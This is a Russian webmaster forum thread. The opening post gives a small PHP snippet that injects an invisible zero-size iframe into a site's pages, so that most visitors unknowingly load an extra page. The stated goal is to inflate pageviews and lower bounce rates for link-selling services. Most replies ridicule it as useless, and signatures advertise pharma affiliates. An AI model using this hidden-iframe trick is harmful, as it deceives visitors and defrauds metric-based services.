"Поведенческие факторы", говорите? Накрутим до небес!

Willie
На сайте с 08.10.2008
200
6693

Миф о том, что поведенческие факторы посетителя, перешедшего на сайт, влияют на ранжирование, развенчивается достаточно просто - тупым увеличением числа страниц, просмотренных им. Думаете, это хоть на йоту влияет на позиции сайта? Как говорится, "накося - выкуси".

Да, для принятия во всякие Г-сервисы типа GGL это сильно поможет, да и процент отказов снизит ниже плинтуса. А как? Три строчки кода на PHP - и золотой ключик у вас в кармане!

ИНСТРУКЦИЯ ПО НАКРУТКЕ ПОВЕДЕНЧЕСКОГО ФАКТОРА

1. Создать страницу на чистом HTML, и никакой рекламы на ней! За рекламу можно очень увесисто получить по попе от РСЯ или Адсенса. На HTML - чтоб максимально быстро открывалась. Контент - любой, осмысленный.

2. В самый низ шаблона сайта, перед тегом </BODY>, внедрить следующий PHP-код:

<?php

$n = mt_rand (0,9);

if ($n>3) echo '<iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"

src="_адрес_страницы_на_HTML_"></iframe>';

?>

3. Числом "3" в данном случае регулируется степень накрутки поведенческого фактора. Чем оно больше - тем меньше накрутка. Три - что-то вроде оптимального.

4. Тем, кому действительно нужно "до небес", можно посоветовать создать много таких страниц (и, соответственно, кодов).

5. Точно по такому же принципу действуют продавцы трафика. Да, а вы что думали? Что вам сольют честных посетителей-покупателей, да? Для недоверчивых - ТОЛЬКО ДЛЯ ОДНОГО! - на сутки могу привести таким образом 5000 уников совершенно забесплатно. Для этого достаточно подставить вместо адреса страницы вашу целевую.

Как видите, все просто, как грабли. 60% (в данном примере) посетителей сайта помимо их воли отправляются "просматривать" еще одну страницу, которая откроется в невидимом для них фрейме, таким образом снижая bounce rate. Что это не влияет на выдачу - я уже сказал, что это влияет на принятие сайтов во всяческие сервисы - тоже. По сравнению с ЯваСкриптом имеет плюс: не блокируется.

ПОЯСНЕНИЯ:

1. Рекламу НЕЛЬЗЯ показывать во фреймах! Поэтому HTML-страница переброса должна быть без нее.

2. Не блокируется ничем, и юзер ничего на замечает. Задержка - десятые доли секугды (зависит от хостера).

3. Деньги за открытую методику перечислять в Фонд Защиты Тараканов.

ПРОБУЙТЕ!

Образец применения - http://nalogitax.ru/

Попробовать мобильные прокси бесплатно: clck.ru/3EKDyC
777Sochi
На сайте с 09.10.2011
14

бред, ведь никто мышкой в ифрейме не будет водить а тем более кликать - соотв. этот просмотр и не учитывается в ПФ ибо он 100% фейковый

короче накрутка для школьников :)

Good luck! :)
Cthulchu
На сайте с 09.09.2011
50
777Sochi:
бред, ведь никто мышкой во фрейме не будет водить а тем более кликать - соотв. этот просмотр и не учитывается в ПФ ибо он 100% фейковый

это еще пол беды. автор, хочешь о накрутке больше узнать?

http://nakrytka.info/povedencheskij-faktor-dlya-google

ибо, видимо, ты не совсем понимаешь алгоритмы определения накруток...

зы

простите за ссылку, но одно и то же каждому повторять за**ешся.

я смею всё, что смеет человек. кто смеет больше, тот не человек.
F
На сайте с 16.01.2010
267

Willie, ты хоть сам понял, какой бред ты тут написал?

1. Убейся об стену, а перед этим узнай таки, что такое поведенческие факторы.

2. Какие ещё поведенческие факторы в Гугле?

3. Как между собой связаны накрутка хитов и поведенческие факторы?

P.S.: У твоего школо-скрипта борода ниже колен.

wwwwww
На сайте с 29.04.2011
195
Cthulchu:
простите за ссылку, но одно и то же каждому повторять за**ешся.
СЕО понятия
Но показатели google+, в купе
являются, ... так же
слудеющие

Там про что написано и на каком языке?

Видишь? Свободная подпись.
Willie
На сайте с 08.10.2008
200
futuristian:
P.S.: У твоего школо-скрипта борода ниже колен.

Не поверите, но это скрипт 1994 года, когда появились счетчики и стало модным их накручивать.

Я и говорю, что новое - это хорошо забытое старое. Число отказов идёт вниз? Число просмотренных страниц растет? Да. собственно, это и требовалось "улучшить".

Как доказать, что это РАБОТАЕТ и дает пользу - не по части продвижения, конечно, но в другом отношении - я знаю. А вот какие возражения - толком не понял.

manca
На сайте с 17.08.2008
170

хрень какая-то..

Куплю приложения ! рассмотрю любые, с доходом и без
[Удален]

Жесть, да и только)

seo_optimist
На сайте с 09.09.2009
108
Willie:
Не поверите, но это скрипт 1994 года, когда появились счетчики и стало модным их накручивать.

Я и говорю, что новое - это хорошо забытое старое. Число отказов идёт вниз? Число просмотренных страниц растет? Да. собственно, это и требовалось "улучшить".

Как доказать, что это РАБОТАЕТ и дает пользу - не по части продвижения, конечно, но в другом отношении - я знаю. А вот какие возражения - толком не понял.

В рейтингах меня за такое банили еще в 2000 году, почему вы уверены что не забанят сейчас? )

А насчет поведенческих факторов, то у меня большое сомнение что гугл это зачтет, ведь очень сильно играет роль месторасположение фрейма, его видимость, как в окне бравзера,

К тому же именно на этот поведенческий фактор гугл смотрит едва ли в первую очередь

dino_spomoni
На сайте с 09.06.2007
633

Даже если бы это работало, не логично как то выкладывать в общий доступ )

#1 ФАРМ партнёрка, API, 80%+ АПРУВ! Мега крутой конверт, льем всю фарму! -> https://bit.ly/3EvLxX8 | Профи в фарме? Тебе в Union Pharm! -> https://u.to/aXwsIg | PharmEmpire - ТОП Конверт фарма трафика!!! -> https://clck.ru/QrgKx | Рассылки цифровых сообщений и на WhatsApp! -> https://bit.ly/3FVSDYb
F
На сайте с 16.01.2010
267
Willie:

Willie, в моём посте есть ещё 3 пункта, будь добр ознакомься с ними. И перестань писать бредятину.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий